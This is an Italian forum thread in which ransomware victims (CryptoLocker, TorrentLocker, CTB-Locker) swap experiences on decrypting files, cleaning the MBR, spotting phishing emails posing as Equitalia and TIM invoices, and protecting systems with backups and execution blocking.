Scusate, dopo aver preso questo virus, e dopo aver decriptato, volevo formattare l'ssd e ripartire da zero (con l'occasione installerò direttamente win 10, e passerò allo stile di formattazione GPT).
Adesso, dopo aver formattato le partizioni, tanto per essere sicuro, devo fare anche una pulizia dell'mbr? E qual'è il comando su un disco sul quale attualmente ho win 8 (installato su disco MBR, e non GPT)? Perchè il vecchio format \mbr (non ricordo l'esatta sintassi) non mi pare funzioni con win 8.
inoltre, lanciato il comando per pulire l'mbr posso ancora fare un avvio del vecchio win 8 infetto? Oppure lo devo fare come ultimo apssaggio della puliza dell'ssd perchè sennà poi non riavvio? Ho letto varie guide su internet, am sono un po' confuso.

Peraltro, ma se avessi avuto una UEFI install di win 8 (ovvero un disco GPT), dovevo sempre pormi il problema del pulire l'mbr?

Salve.. Ci sono speranze di recuperare i file cryptati?
Perche quello mi pare il punto dolente

Se segui le istruzioni dovrebbero farti fare anche una prova preventiva con un file a tua scelta di dimensione non troppo grossa.

Cmq...
Oggi mi arriva un cliente con una nuova variante, presa su un notebook che ha infettato la copia dei files non in linea per fortuna era fuori sede in questi giorni e perciò non è stato toccato niente sui dati in rete.
File sul notebook senza nessuna modifica (copiati e ora si sta ripristinando con i dati di fabbrica) lui si è accorto dai file non in linea di un unità di rete che erano stati modificati.

Quindi prima agisce in rete, poi in locale il simpaticone.... :rolleyes:
ATTENZIONE l' estensione è diversa per ogni files, non è unica, sono 5 o 6 caratteri casuali quindi sono ancora più simpatici i maledetti! :doh:

Premesso che potresti benissimo lasciar stare mbr (non ho letto di casi in cui il virus abbia intaccato anche quello) comunque se vuoi per sicurezza riavvia in modalità provvisoria, poi scegli risoluzione dei problemi, opzioni avanzate, prompt dei comandi e poi digita:
bootrec /fixmbr
bootrec /fixboot
Questo dovrebbe ristabilire mbr. Per bios uefi ignoro non avendone uno, sorry.

@juky: per i file decriptati o sei fortunato di aver preso una delle prime versioni (in tal caso esiste un tool di kaspersky che prova a decriptare in base alle key trovate in una prima fase, non ricordo il nome però del tool) oppure puoi provare come da manuale shadowexplorer per vedere se il sistema è riuscito a salvare qualche backup o infine un software di recupero dati cancellati tipo recuva o similari.
Tuttavia occorre molto fortuna, le ultime varianti fanno dannatamente bene il loro lavoro.

Premesso che potresti benissimo lasciar stare mbr (non ho letto di casi in cui il virus abbia intaccato anche quello) comunque se vuoi per sicurezza riavvia in modalità provvisoria, poi scegli risoluzione dei problemi, opzioni avanzate, prompt dei comandi e poi digita:
bootrec /fixmbr
bootrec /fixboot
Questo dovrebbe ristabilire mbr. Per bios uefi ignoro non avendone uno, sorry.



Ok, per UEFI install e dischi GPT chiedevo giusto per curiosità, visto che ho un disco MBR e bios UEFI in modalità compatibile. Direi per future evenienze (e qui mi gratto!).

Allora sfrutto il dvd di installazione di win 8 che ha varie sezioni per la risoluzione dei problemi, ivi incluso il prompt, e farò ciò che grossomodo ho letto anche su alcune guide (ma non mi era chiaro se erano solo comandi da usare in caso di mbr corrotti che non facevano avviare il SO, o se andavano bene anche per mbr infettati da virus, oltre al fatto che ho trovato una pletora di comandi differenti, e non ho capito quali avrei dovuto lanciare per evitare di fare danni ulteriori).
Il comando bootrec /RebuildBcd e bootrec /ScanOs invece non serve nel mio caso (che tu sappia)?

Ultimo chiarimento: questi comandi sono un fix tranquillo che ricostruisce un mbr funzionante e pulito o dopo di essi potrei non riuscire più ad avviare il SO infetto? Perchè se dopo averli eseguiti posso riavviare ancora l'OS allora procedo subito, diversamente ho ancora qualche accesso da effettuare sul vecchio SO infetto (ed in teoria ripulito) per recuperare qualche cartella di configurazione di programmi.


PS peraltro ho usato l'AV di Dr web per ripulire. Ha trovato si e no 3 file riguardanti il virus, e non ha fatto riferimento ad alcuna chiave del registro di sisstema da cancellare/ripristinare. Non so se è perchè quelle le ripulisce in automatico senza citarle nel report della scansione, o perchè proprio non le ha toccate. Boh. Però non mi sembra male come suite: l'altro giorno nell'installare Cryptoprevent ho visto che un modulo di protezione dell'AV Dr web security space chiedeva di dare autorizzazioni specifiche, dal che mi pare di aver capito che lo stesso Dr web integra un tipo di protezione analogo a quello che fornisce Cryptoprevent.

Considerazione finale: inizio a pensare che ad oggi gli av gratuiti non bastano più (se non usati in coppia con altri software anche gratuiti tipo anti exploit, antimalware ed altri, e sempre sperando che queste accoppiate fai da te non creino conflitti letali per il SO). La soluzione migliore è usare suite complete di una softwarehouse che non creino conflitti e garantiscano tutti i livelli di protezione, sia firewall, che av, che antiexploit su internet, sia di controllo dei permessi sulle cartelle di sistema (quello che fa Cryptoprevent).



juky: se vuoi recuperare i file hai 2 possibilità (nessuna delle 2 dà garanzie certe però):
1) paghi il riscatto e speri che ti mandino una chiave di decriptazione funzionante
2) ti affidi a Dr web e vedi se la tua variante rientra fra le poche che sono in grado di decriptare. Se mandi i file a Dr web russo ti risponde, ma ti rinvia anche al loro partner italiano. gli italiani sono molto veloci a risponderti (il che, se hai un countdown in atto e non hai scartato del tutto l'ipotesi di pagare il riscatto, ha una sua importanza) circa la risolvibilità del tuo caso.

I comandi dovrebbero far ripartire senza problemi il sistema operativo se non ha subito modifiche strane (occhio ai dual boot però se hai più os installati).
Gli altri due comandi non li conosco ma immagino siano un ulteriore esame sulla struttura di avvio, male non credo che facciano.
Di chiavi di registro di solito c'è ne dovrebbero essere due o tre: una per l'esecuzione in automatico all'avvio in particolare. Basta comunque una passata di malawarebytes in modalità provvisoria e cancelli anche quelle se presenti.
Concordo sugli av: per queste minacce servono a poco. Può essere utila utilizzare lo script di qualche post addietro che blocca gli eseguibili dalle directory appdata e localdata che sono quelle utilizzate dai malware attuali (anche cryptolocker); forse un giorno cambieranno ma al momento aiuta.
Bitdefender ha anche fatto un piccolo software uguale a cryptoprevent se non ci si fida di software sconosciuti ovvero Bdanticryptowall (ma fanno la stessa cosa dello scrypt, ovvero bloccare l'esecuzione dai soliti luoghi d'attacco).

I comandi dovrebbero far ripartire senza problemi il sistema operativo se non ha subito modifiche strane (occhio ai dual boot però se hai più os installati).
Gli altri due comandi non li conosco ma immagino siano un ulteriore esame sulla struttura di avvio, male non credo che facciano.
Di chiavi di registro di solito c'è ne dovrebbero essere due o tre: una per l'esecuzione in automatico all'avvio in particolare. Basta comunque una passata di malawarebytes in modalità provvisoria e cancelli anche quelle se presenti.
Concordo sugli av: per queste minacce servono a poco. Può essere utila utilizzare lo script di qualche post addietro che blocca gli eseguibili dalle directory appdata e localdata che sono quelle utilizzate dai malware attuali (anche cryptolocker); forse un giorno cambieranno ma al momento aiuta.
Bitdefender ha anche fatto un piccolo software uguale a cryptoprevent se non ci si fida di software sconosciuti ovvero Bdanticryptowall (ma fanno la stessa cosa dello scrypt, ovvero bloccare l'esecuzione dai soliti luoghi d'attacco).

Nessun dual boot. Win 8 l'avevo installato su questo ssd appena comprato.
Mò vedrò se scaricare e passare anche malwarebytes, dal momento che devo formattare tutto e comunque l'infezione sembrerebbe già curata con Dr web. E' giusto una curiosità per capire meglio la meccanica di funzionamento del virus.
Invece mi rimangono ancora alcune cose su cui informarmi, fra le quali un dettaglio assai delicato di cui mi sono accorto in questi giorni. Infatti ho notato che nel fare il backup o la decriptazione dei file del vecchio ssd, alcune cartelle non venivano copiate/decriptate. In pratica attaccando via usb il vecchio ssd infetto e cifrato ad un pc con un SO pulito, alcune cartelle "di sistema" del vecchio C infetto non vengono gestite normalmente dal nuovo SO. In pratica per accedere ad es alle cartelle utente del vecchio C dal nuovo SO dovevo inserire la psw dell'account admin del nuovo OS. Cosa che non mi aspettavo (non capisco perchè il nuovo SO riconosca come cartelle "peciali" o di sistema delle cartelle create da un altro SO e che non stanno sulla partizione di sistema attiva. Tutto ciò mi complica non di poco le cose alla vigilia del formattone, poichè non sapendo con esattezza su quante cartelle c'è questa necessità, rischio di fare copie parziali dei dati che poi andrò a cancellare con il format. Insomma, dopo aver trovato il tool per decriptare in toto i dati (in teoria la parte più difficile di tutta la vicenda), rischio ora di perderne una parte per una procedura di copia maldestra.
Lo scrivo qui perchè devo dire che le conseguenze di questo malware sono assai più insidiose e numerose di quel che pensavo all'inizio, quando tutta la mia attenzione era focalizzata sul problema del decriptare i dati.


Ps credo che di Cryptoprevent ci si possa fidare, dal momento che è consigliato anche su un forum come bleeping che è molto ben quotato riguardo la lotta a questo tipo di malware (mi pare che uno degli amministratori abbia a suo tempo creato uno dei pochissimi tool gratuiti per decriptare i file da una delle prime versioni del malware).


PPS non ricordo se qui l'avevo già scritto. Ma ho il sempre più fondato sospetto di aver beccato questo virus non su un sito di streaming video (come scrissi all'inizio), bensì sul sito di repubblica. Anche se mi pare ancora piuttosto improbabile.

Purtroppo sono stato colpito da questo virus in particolare mi ha colpito tutti diversi file che avevo in un hd portatile collegato via usb, ho migliaia di foto criptate e diversi documenti criptati...
domanda...visto alcuni documenti in xls alcuni protetti da password ecc...sono alquanto importanti, volevo sapere se questi bastardi possono anche vedere questi documenti e magari carpire dei miei dati sensibili e/o password?
Ora non dovrei avere più il virus...ma volevo chiedervi nel caso sia ancora presente se posso avere dei problemi andando a fare pagamenti con paypal o andando dentro alla mia banca on line ecc..? Corro dei rischi??Se si come meglio posso proteggermi?

Siccome quasi tutti i filmati sono rimasti intatti ora posso farne una copia sicura e salvarla su altri hd che sono sempre all'interno del pc dal quale è iniziata l'infezione? Che software devo usare per fare un backup sicuro al 100% ? Il pc infettato era appena stato installato win7 nuovo su ssd e due hard disk di dati che ora sono vuoti ma che riformatto magari..

Purtroppo il sito che online potevi decriptare non esiste più...i vari shadows in un hard disk portatile via usb non esistono...ci sono altri mezzi?

se tengo i file criptati sul disco in attesa di soluzione incorro in qualche pericolo? chiaramente visto che il disco è molto capiente continuerei a mettere programmi e nuove foto ecc...o sarebbe un rischio?

Io formatterei il Pc e ricaricherei tutto per sicurezza visto che da qualche parte è entrato (come? posta? sito internet?)

Per i tuoi documenti ti faccio un esempio:
Una sera lasci la macchina sotto casa, in un momento di distrazione un ti mette le ganasce sulle ruote e ti lascia un foglietto che se vuoi liberare la macchina devi pagare un pizzo.

La macchina è sotto ai tuoi occhi (quindi i tuoi documenti) non è stata spostata con il carro attrezzi (quindi i documenti non sono andati in giro)
solo che non la puoi più usare.

E' chiaro ora?

Per i siti, prova e riprova a volte dipende dall' orario di collegamento e dall' utilizzo di un browser TOR, se hai i backup puoi fare senza.
Quando ti collegherai ti farà fare una prova di decrittazione, lì usa un file non importante perché quello è una parte dei tuoi dati e non si sa mai.

cosa sono i browser tor?

poi vorrei capire se i documenti "sensibili" che sono stati criptati che avevo in files xls o word in alcuni casi avevo messo delle passw. per aprirli)possono essere visionati da questi pirati e quindi possono leggere eventuali password oppure posso stare al sicuro?

Devo quindi cambiare eventualmente password alla banca on line o posso stare sicure dal questo punto di vista??

Li sei tranquillo per le password bancarie ma cambiarle non fa mai male... ma su una macchina a posto e senza virus così sei al sicuro

Se i tuoi files hanno la password come fanno i pirati ad aprirli a parte metodi di forza bruta? E poi tu non fai prima a cambiare la password nel dubbio?

Ciao a tutti!
Qualcuno di voi che ha contattato Dr. Web per il decriptaggio ha per caso avuto notizie in merito? Sono riusciti a recuperarvi i files? Fateci sapere in ogni caso per favore!!

Io formatterei il Pc e ricaricherei tutto per sicurezza visto che da qualche parte è entrato (come? posta? sito internet?)


perdonami, ma questo è un pessimo consiglio.
Alcuni decrypt tool per funzionare hanno bisogno della struttura del filesystem esatto su cui è avvenuto l'attacco (ossia vogliono i file criptati nella posizione che avevano all'attacco).
Alcuni vecchi ransomware memorizzano addirittura la chiave privata nel registro di sistema, pensa un po' tu che danno puoi fare con una formattazione.

xam4033, la prima cosa da fare è cercare di individuare precisamente quale ransomware ti ha colpito e in che variante.
Nel frattempo io non toccherei l'hard disk colpito, lo riporrei in un cassetto e basta in attesa di novità.

in alcuni txt ho letto che il virus è proprio il ctb locker...il più schifoso in pratica....ma ora vorrei capire come fare per proteggermi ad esempio su di un altro pc che posseggo...ci sono antivirus o altre cose che proteggono efficacemente da questi maledetti virus?? Tengo a precisare che in pratica mi ha colpito quasi esclusivamente tutte le foto i filmati non sono stati toccati...

la protezione più efficace è il backup..

Ciao a tutti!
Qualcuno di voi che ha contattato Dr. Web per il decriptaggio ha per caso avuto notizie in merito? Sono riusciti a recuperarvi i files? Fateci sapere in ogni caso per favore!!

Io l'ho fatto. Nel mio caso, dopo un paio di tentativi, mi hanno approntato una chiave che ha decriptato tutti i file correttamente.

Se hai domande specifiche fai pure. In questi giorni sto per formattare tutto e reinstallare (quindi potrei avere qualche difficoltà a consultare il topic). Se non vedi mie risposte mandami un link al tuo post in pvt.


in alcuni txt ho letto che il virus è proprio il ctb locker...il più schifoso in pratica....ma ora vorrei capire come fare per proteggermi ad esempio su di un altro pc che posseggo...ci sono antivirus o altre cose che proteggono efficacemente da questi maledetti virus?? Tengo a precisare che in pratica mi ha colpito quasi esclusivamente tutte le foto i filmati non sono stati toccati...

Puoi usare Cryptoprevent. Anche l'AV di Dr web non dovrebbe esser male. Lo sto usando. Ma non sono così esperto da poterlo giudicare.
Come ho scritto alcuni post addietro, credo che gli unici AV che offrono un'adeguata (e mai totale comunque) protezione sono le suite complete che offrono tutti i tipi di strumenti di sicurezza per fronteggiare ad attacchi che avvengono con dinamiche varie. Dunque oltre alla protezione tramite firme virali, serve anche un modulo, anti toolkit, un antiexploit per la navigazione web (io l'ho preso così, e non mi è bastato ad block e nemmeno no script, che ad ogni buon conto spesso devi disattivare parzialmente per navigare o visualizzare correttamente certi contenuti o certe pagine), un modulo per il controllo della posta, ed uno che controlla il comportamento del SO in generale (monitora le app, blocca l'esecuzione degli exe in certe cartelle etc).
Aiuta, ma non salva, anche usare un account senza privilegi di amministrazione.

Io l'ho fatto. Nel mio caso, dopo un paio di tentativi, mi hanno approntato una chiave che ha decriptato tutti i file correttamente.

Avevi preso il CTB-Locker o qualche altra variante più datata???

Mio Papà ha preso il CTB-Locker il 30/12/2015 aprendo un file ZIP proveniente da una mail con indirizzo mittente pagamenti@equitailia.it
Il virus ha infettato il PC di mio Papà e tutto il NAS che era in condivisione.
Stiamo facendo di tutto per recuperare il recuperabile ma non ho gran speranze.
Il riscatto chiestoci è di 2 BTC (quindi circa 830/850 €), il problema è che anche effettuare la procedura di riscatto non è così semplice....

Mi piacerebbe saper chi ha pagato come e su che siti ha acquistato i Bitcoin.

Se hai decriptato i file criptati da CTB-Locker sarebbe un'ottima notizia. Fammi sapere se possibile.

In ogni caso vi terrò aggiornati sull'evoluzione della vicenda.

Avevi preso il CTB-Locker o qualche altra variante più datata???

Mio Papà ha preso il CTB-Locker il 30/12/2015 aprendo un file ZIP proveniente da una mail con indirizzo mittente pagamenti@equitailia.it
Il virus ha infettato il PC di mio Papà e tutto il NAS che era in condivisione.
Stiamo facendo di tutto per recuperare il recuperabile ma non ho gran speranze.
Il riscatto chiestoci è di 2 BTC (quindi circa 830/850 €), il problema è che anche effettuare la procedura di riscatto non è così semplice....

Mi piacerebbe saper chi ha pagato come e su che siti ha acquistato i Bitcoin.

Se hai decriptato i file criptati da CTB-Locker sarebbe un'ottima notizia. Fammi sapere se possibile.

In ogni caso vi terrò aggiornati sull'evoluzione della vicenda.


Il mio nelle istruzioni recava "Crypt0L0cker", ma su vari forum dicevano che in realtà è una variante di Torrent locker (scusate, mi ero sbagliato a scrivere inizialmente, non è una variante di CBT locker) . Peraltro molti con istruzioni uguali alle mie dicevano che Dr web non riusciva a decriptarglieli.
Perciò consiglio personale: manda i file campione a Dr web, come richiesti da loro, e vedi che ti dicono.

Con alcune varianti è possibile che esista la chiave di decriptazione semplicemente perchè hanno in passato smantellato alcuni server degli hacker. Pertanto più è "vecchia" la versione più ci sono possibilità di recuperare la chiave adatta.
Come diceva qualcuno orsono si dovrebbe conservare anche la chiave di registro per poter usufruire in futuro di eventuali soluzioni (io ci credo poco, ma chissà), per alcune versioni era del tipo come quella descritta nel post 320 qui:
http://www.bleepingcomputer.com/forums/t/561970/new-pclock-cryptolocker-ransomware-discovered/page-22#entry3593039
se può essere utile.

OK adesso vedo come muovermi, l'idea di pagare, personalmente la scarto, mio Papà non è della stessa idea avendo perso tutto. Io fortunatamente una copia di Backup delle cose importanti, anche se non recentissima, ce l'avevo.

anch'io preso tramite e mail d equitalia...maledetta mail !!!
Ma dov bisogna andare per scrivere su Dr, WEB? ed inoltre volevo capire...bisonga pagare qualcosa??
DI sicuro io non mi fido delle indicazioni che im hanno dato per pagare il riscatto...

ALtra cosa...io volevo formattare tutto e salvare questi file criptati in un bluray...ma dite che poi se quelli di DR.WEB o se trovano altre soluzioni non basta avere i files criptati? Tenete conto che io ho preso l'infezione su un pc con win 7 al quale è collegato un hd via usb...ma in pratica mi ha criptato al 90% solo l'hd esterno...la mia intezione attuale sarebbe quella di formattare tutto e salvare solo i files criptati...ma mi sembra di capire che sarebbe meglio non farlo o sbaglio?...potrei eventualmente solo formattare il pc e tenere l'hd esterno con i file criptati?

ATtendo vs. consigli GRAZIE

Dovresti cercare di verificare esattamente quale versione del malware hai beccato e poi vedere cosa ti serve esattamente: nel link che ho postato poco sopra ad esempio c'è l'indicazione anche della chiave di registro necessaria per un eventuale decriptazione. Con i file criptati ci dovrebbe essere anche la prima parte della chiave di decodifica.
Per dr web lascio la parola a chi l'ha utilizzato ma immagino ci sia una mail presso cui chiedere.
Curiosità: hai aperto volontariamente l'allegato della mail o è bastata solo la visualizzazioe? Che client di posta utilizzi?

Curiosità: hai aperto volontariamente l'allegato della mail o è bastata solo la visualizzazioe? Che client di posta utilizzi?

Mio papà ha aperto l'allegato, era un file ZIP. Non ho ancora potuto guardare se il file era un file XXX.ZIP.EXE (o CAB piuttosto che SCR o altri eseguibili di windows) o semplicemente .ZIP poichè il PC è stato portato presso un tecnico e quindi non ho visto le estensioni dei file erano nascoste. Mi sembra comunque di ricordare che il file aveva l'icona di WinRAR quindi deduco che fosse un archivio compresso.
Comunque visionando la sola mail non succede nulla.

Il mio nelle istruzioni recava "Crypt0L0cker", ma su vari forum dicevano che in realtà è una variante di CTB-Locker. Peraltro molti con istruzioni uguali alle mie dicevano che Dr web non riusciva a decriptarglieli.
Perciò consiglio personale: manda i file campione a Dr web, come richiesti da loro, e vedi che ti dicono.

Posso sapere quanto ti hanno chiesto i "signori" DR.Web?

Qualcuno di voi ha usato il tool kspersky per la decriptazione?
Io ci ho provato ma non fa nemmeno la scansione di un file.....da sempre 0, 0, 0, 0 eppure nella cartella di destinazione ci sono i file *.doc.encrypted :confused:

anch'io voglio sapere se si paga con dr.web e quanto...e poi su che sito bisogna andare per dare questi files?? Grazie

ambito aziendale, ma anche privato.


Da quel che ho visto in giro questi due punti anche se soddisfatti NON sono sufficienti per stare tranquilli:

- AV aggiornato
- utente con permessi limitati

Bisogna aggiungere sicuramente:

- Backup (che NON deve essere MAI direttamente accessibile, es: NON deve essere mappato tra le risorse del PC)

Ma il backup è l'ultima spiaggia.

Un punto probabilmente importante da aggiungere alla "catena di protezione" è:

- impedire l'esecuzione di qualsiasi file dalla cartella AppData dell'utente.

Solo a questo punto mi sentirei MOLTO più tranquillo.

Eventualmente discriminando una serie di POCHI file che devono essere mantenuti eseguibili (plugin particolari..)

anch'io preso tramite e mail d equitalia...maledetta mail !!!

Per posta normale?

Scusatemi, ma se apro i programmi in una sandbox oppure in un sistema virtualizzato, Cryptolocker non riuscirebbe a superare l'ambiente virtualizzato e a bloccarmi i file del sistema operativo e hard disk fisici. Giusto?

Scusatemi, ma se apro i programmi in una sandbox oppure in un sistema virtualizzato, Cryptolocker non riuscirebbe a superare l'ambiente virtualizzato e a bloccarmi i file del sistema operativo e hard disk fisici. Giusto?

è vero e giusto SOLO se non hai mappato drive e cartelle del tuo PC fisico.
(ovviamente se entrasse in azione, cripterebbe solo i file contenuti in quelle cartelle mappate)

Scusatemi, ma se apro i programmi in una sandbox oppure in un sistema virtualizzato, Cryptolocker non riuscirebbe a superare l'ambiente virtualizzato e a bloccarmi i file del sistema operativo e hard disk fisici. Giusto?

si spera quantomeno, voglio dire si usa una sandbox proprio per evitare che un eventuale virus vada a far danni al di fuori della sandbox

anche se un sistema virtualizzato dovrebbe essere più sicuro rispetto ad una sandbox

Scusatemi, ma se apro i programmi in una sandbox oppure in un sistema virtualizzato, Cryptolocker non riuscirebbe a superare l'ambiente virtualizzato e a bloccarmi i file del sistema operativo e hard disk fisici. Giusto? Dipende. Potrebbero esistere varianti che riconosciuto l'ambiente virtuale, tentano exploit conosciuti per uscirne così come potrebbero esistere varianti che browsano tutte le risorse di rete condivise in cui vi è permessa la scrittura.

Questi software si evolvono talmente velocemente che l'unico sistema sicuro è avere più copie di backup offline e magari una copia in cloud (ma crittografati in un container) così da avere i dati dislocati in zone geograficamente distanti in modo da poterli recuperare anche in caso di catastrofi (incendi/alluvioni etc).

qui si parla di una nuova infezione simile, sempre ransomware chiamata
Win32/Filecoder.NFR
http://www.repubblica.it/tecnologia/sicurezza/2016/01/14/news/ecco_il_virus_che_si_veste_da_google_chrome-131258782/

Per posta normale?

si

ora arrivano come allegati di fattura tim
menomale che eset nod mi ha segnalato e messo in quarantena il file
subito cancellato

http://i.imgur.com/pUIJlZY.jpg

si

Non ti è venuto in mente che Equitalia invia solo per PEC e posta raccomandata?

ora arrivano come allegati di fattura tim
menomale che eset nod mi ha segnalato e messo in quarantena il file
subito cancellato

http://i.imgur.com/pUIJlZY.jpg

Con quell' italiano correggiuto? "il fattura attaccato" :stordita:

Non ti è venuto in mente che Equitalia invia solo per PEC e posta raccomandata?



Con quell' italiano correggiuto? "il fattura attaccato" :stordita:

segnalato da TGSOFT

http://www.tgsoft.it/italy/news_archivio.asp?id=680

http://www.tgsoft.it/immagini/news/CTB_Locker/20160114_TIM_CTB-Locker_E-mail.jpg

Ma poi il numero 097187278 è il tuo? :D

Bisogna proprio aver il cervello sovrappensiero per avrire una mail del genere
:doh:

Io l'ho fatto. Nel mio caso, dopo un paio di tentativi, mi hanno approntato una chiave che ha decriptato tutti i file correttamente.

Se hai domande specifiche fai pure. In questi giorni sto per formattare tutto e reinstallare (quindi potrei avere qualche difficoltà a consultare il topic). Se non vedi mie risposte mandami un link al tuo post in pvt.

Fantastico!! Finalmente qualche buona notizia! Se non ricordo male hai speso 150,00 Eurini per il servizio. Ma ti hanno decriptato tutti i files? I tempi non mi sono sembrati impossibili. Una cosa che non ricordo è con quale variante di Crypt0L0cker sei stato contagiato. L'estensione dei files criptati era per caso .ccc? Hai aperto il ticket ma non hai dovuto acquistare il loro antivirus?

Fantastico!! Finalmente qualche buona notizia! Se non ricordo male hai speso 150,00 Eurini per il servizio. Ma ti hanno decriptato tutti i files? I tempi non mi sono sembrati impossibili. Una cosa che non ricordo è con quale variante di Crypt0L0cker sei stato contagiato. L'estensione dei files criptati era per caso .ccc? Hai aperto il ticket ma non hai dovuto acquistare il loro antivirus?

180€ per la precisione.

Si tutti i file sono decriptati (per le prove che ho potuto fare: non ho ancora rimesso tutto a posto, dovendo reinstallare tutto). Ma sembra davvero che (la 2° chiave) possa decriptare tutto e correttamente, senza file corrotti.
I tempi: dr web il sito internazionale un po' lento (per chi ha il countdown e non esclude come ultima chance di pagare se le cose non andassero a buon fine con dr web): mi pare sui 4 gg. I loro partner italiani invece sono stati molto veloci nel rispondere. E comunque si deve passare per loro (così mi ha detto dr web). Pertanto se siete di fretta passate direttamente da qui:

Ho si chiamava cript0L0cker nelle istruzioni, ma pare sia torrentlocker. Poi quale sottovariante non so, perchè su un forum internazionale altri italiani che postavano facendo riferimento allo stesso file istruzioni che avevo io hanno poi ricevuto risposta negativa da Dr web circa la possibilità di decriptare i loro file. L'estensione era .encrypted.
Ho aperto il ticket, e nel rescue pack per la decriptazione era anche inclusa una licenza per 2 anni del loro AV. In pratica se ti dicono che la decriptazione è possibile paghi, ed in omaggio hai anche 2 anni di licenza del loro AV, che ti darà diritto ad assistenza gratuita in caso di ulteriori infezioni da virus che criptano i file.

Ma poi il numero 097187278 è il tuo? :D

Bisogna proprio aver il cervello sovrappensiero per avrire una mail del genere
:doh:

logico che non è il mio numero

stamattina ne è arrivata un altra sempre bloccata da Eset
riconosciuto come Win32/Filecoder.da Troian

Ora;Scanner;Tipo di oggetto;Oggetto;Minaccia;Azione;Utente;Informazioni
17/01/2016 09:44:47;Filtro IMAP;messaggio e-mail;
da: Telecom Italia-TIM <servizioclienti@telecomitalia.it>
con oggetto Fattura TIM linea Fissa - Gennaio 2016 - scadenza 01/16/2016 data Sun, 17 Jan 2016 06:37:50 +0800 (CST) ;Win32/Filecoder.DA trojan horse;conteneva file infetti;
Minaccia rilevata alla ricezione di e-mail dall'applicazione: C:\Program Files (x86)\Windows Live\Mail\wlmail.exe.

logico che non è il mio numero

stamattina ne è arrivata un altra sempre bloccata da Eset
riconosciuto come Win32/Filecoder.da Troian

Ora;Scanner;Tipo di oggetto;Oggetto;Minaccia;Azione;Utente;Informazioni
17/01/2016 09:44:47;Filtro IMAP;messaggio e-mail;
da: Telecom Italia-TIM <servizioclienti@telecomitalia.it>
con oggetto Fattura TIM linea Fissa - Gennaio 2016 - scadenza 01/16/2016 data Sun, 17 Jan 2016 06:37:50 +0800 (CST) ;Win32/Filecoder.DA trojan horse;conteneva file infetti;
Minaccia rilevata alla ricezione di e-mail dall'applicazione: C:\Program Files (x86)\Windows Live\Mail\wlmail.exe.

secondo me è impossibile che sia arrivata tramite servizioclienti@telecomitalia.it, devi vedere bene l'header della mail dove sicuramente c'è un indirizzo strano, tanto loro usano i server che camuffano il mittente in quello che vogliono farti vedere, ho visto che google invece ha il servizio che ti dice che la mail è stata mandata da un altro indirizzo

secondo me è impossibile che sia arrivata tramite servizioclienti@telecomitalia.it, devi vedere bene l'header della mail dove sicuramente c'è un indirizzo strano, tanto loro usano i server che camuffano il mittente in quello che vogliono farti vedere, ho visto che google invece ha il servizio che ti dice che la mail è stata mandata da un altro indirizzo

perchè rischiare ad aprire email
io ho riportato quello scritto dal mio antivirus eset nod 9 che menomale lo vede e lo elimina subito

perchè rischiare ad aprire email
io ho riportato quello scritto dal mio antivirus eset nod 9 che menomale lo vede e lo elimina subito

Scusate se mi intrometto un attimo nella discussione, ma se un utente si limita ad aprire la mail senza scaricare nulla, c'è la possibilità di infezione??

Io quando sono in dubbio le apro per fare eventuali verifiche MA senza cliccare ne scaricare alcun allegato, rischio comunque? :confused:

180€ per la precisione.

Si tutti i file sono decriptati (per le prove che ho potuto fare: non ho ancora rimesso tutto a posto, dovendo reinstallare tutto). Ma sembra davvero che (la 2° chiave) possa decriptare tutto e correttamente, senza file corrotti.
I tempi: dr web il sito internazionale un po' lento (per chi ha il countdown e non esclude come ultima chance di pagare se le cose non andassero a buon fine con dr web): mi pare sui 4 gg. I loro partner italiani invece sono stati molto veloci nel rispondere. E comunque si deve passare per loro (così mi ha detto dr web). Pertanto se siete di fretta passate direttamente da qui:

Ho si chiamava cript0L0cker nelle istruzioni, ma pare sia torrentlocker. Poi quale sottovariante non so, perchè su un forum internazionale altri italiani che postavano facendo riferimento allo stesso file istruzioni che avevo io hanno poi ricevuto risposta negativa da Dr web circa la possibilità di decriptare i loro file. L'estensione era .encrypted.
Ho aperto il ticket, e nel rescue pack per la decriptazione era anche inclusa una licenza per 2 anni del loro AV. In pratica se ti dicono che la decriptazione è possibile paghi, ed in omaggio hai anche 2 anni di licenza del loro AV, che ti darà diritto ad assistenza gratuita in caso di ulteriori infezioni da virus che criptano i file.

Grazie per la dettagliata spiegazione. Sto tentando tramite alcuni tools aggiornati a gennaio 2016. Vediamo se riuscirò a recuperare i files. Il problema è trovare sull'HD incriminato la chiave. In caso negativo mi vedo anch'io seguire il percorso che hai seguito tu. D'altra parte se non esiste altro modo, i 180,00 eurini serviranno almeno a qualcosa....almeno ad acquistare un antivirus per 2 anni anche se un pò caro..

porcaccia miseria da deficente me lo sono beccato con quello di tim
corrotto file di tutti gli hd compreso il nas
estensione:hjgvgua
ora sto reinstallando win 10 con formattazzione totale
come recupero i file sugli hd?

Una volta fatto il ripristino gli altri HD non sono infetti, giusto?

Ritirato il NAS oggi, ovviamente non hanno potuto far nulla come immaginavo.

Ritirato il NAS oggi, ovviamente non hanno potuto far nulla come immaginavo.

hai speso $ ? per farlo verificare

Scusate se mi intrometto un attimo nella discussione, ma se un utente si limita ad aprire la mail senza scaricare nulla, c'è la possibilità di infezione??

Io quando sono in dubbio le apro per fare eventuali verifiche MA senza cliccare ne scaricare alcun allegato, rischio comunque? :confused:

iniziamo a usare termini che permettano meno fraintendimenti

dalle esperienze sembrerebbe che "leggendo" le mail non succeda nulla, sia tramite browser che tramite client installate sui sistemi operativi

il rischio sembra circoscritto ad "aprire/scaricare(magari si ha funzione di download automatico per l'apertura)" l'allegato o un click su link nella e-mail

poi di altri rischi nella navigazione web dipende sempre dai siti che si visitano

---
una domanda a chi ha avuto il NAS criptato da questi programmi, avevate l'accesso alle cartelle bloccati da password o erano di libera navigazione le cartelle sul NAS ? la password la lasciate memorizzata su windows in modo da non doverla ripetere ogni volta che accedete?

Scusate se mi intrometto un attimo nella discussione, ma se un utente si limita ad aprire la mail senza scaricare nulla, c'è la possibilità di infezione??
Concordo con @telumehtar. Al momento non sono a conoscenza di casi la cui infezione sia avvenuta per semplice lettura dell'email, TUTTAVIA non c'è *mai* la certezza di non infettarsi facendolo. Potrebbero esistere varianti con qualche exploit per consentire l'esecuzione dell'allegato tramite il software di visualizzazione che usi (browser->flash/java, Outlook->exploit anteprima email, etc). L'unica cosa fondamentale è sempre avere un backup offline :)


una domanda a chi ha avuto il NAS criptato da questi programmi, avevate l'accesso alle cartelle bloccati da password o erano di libera navigazione le cartelle sul NAS ?
